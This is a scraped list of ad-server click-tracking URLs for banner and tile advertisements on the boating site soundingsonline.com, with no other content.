http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19190715/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921522918/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921995207/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1923149033/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1925968507/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1927937446/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19316522/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1931966763/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/193215144/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1938188771/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1942186617/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/194614025/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1949339220/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1953686413/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1955658996/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1956218158/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1960309178/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1966543230/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1972223152/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1988230146/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1993017733/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2000460958/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2003665576/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2011877321/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2018916786/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2027917108/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2028781671/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2033280661/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2035051749/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039360394/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039949584/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2050539924/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2050849505/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2054216298/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2063106975/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2069352430/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2071009563/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2082217498/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2085906817/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2098585488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2101192040/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102258488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102804392/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2105583430/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2106371467/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2110013632/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2129286326/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/21461803/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/222638617/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/230260175/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/23350838/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/238495154/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/249777070/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/263374492/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/267480852/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/277699116/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281105801/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281847158/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/285317148/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/287333455/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/288726570/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/298788808/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/300000781/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/301024327/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/307086521/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/311306263/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312414512/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312913212/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/317209443/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/318047660/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/319855659/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/321743525/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/338106476/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/350884461/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/358188109/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/361144958/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/373221580/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/37601243/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386885083/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/387825037/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/392919129/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396828855/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396936848/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/399157577/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/401425360/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/404785047/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/413179088/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/415127438/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/417517818/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/440360851/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/442122875/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/443045219/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/445245444/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/455812371/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/457264621/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/462425621/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/4636261/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/471646028/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488344786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/498236802/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/503116854/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/504603941/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/505023733/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/506110015/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/509899444/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/512512699/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/521112073/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/522788815/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/524588636/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/527036416/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/527433934/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/537473796/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/543871127/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/551185722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/559964392/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/560089787/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/566136437/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569227535/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569370007/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/577895125/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/586884124/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/590122297/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/598276348/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/613368033/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
